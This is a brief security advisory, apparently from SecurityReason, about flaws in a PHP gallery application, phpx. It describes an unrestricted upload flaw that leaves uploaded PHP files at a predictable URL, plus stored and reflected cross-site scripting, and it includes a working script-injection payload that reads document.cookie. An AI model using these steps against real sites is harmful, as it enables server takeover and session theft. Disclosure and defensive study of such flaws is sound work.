avatar upload vuln:
http://site.com/phpx/gallery.php?action=addImage
you can upload any kind of file in the gallery.
your file gone be refused by the script but it will be located here :
http://site.com/phpx/gallery/shelties/your_filename.php ;)
xss permanent :
dans profile:
-signature
xss non permanent in search.php :
</textarea>'"><script>alert(document.cookie)</script>
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.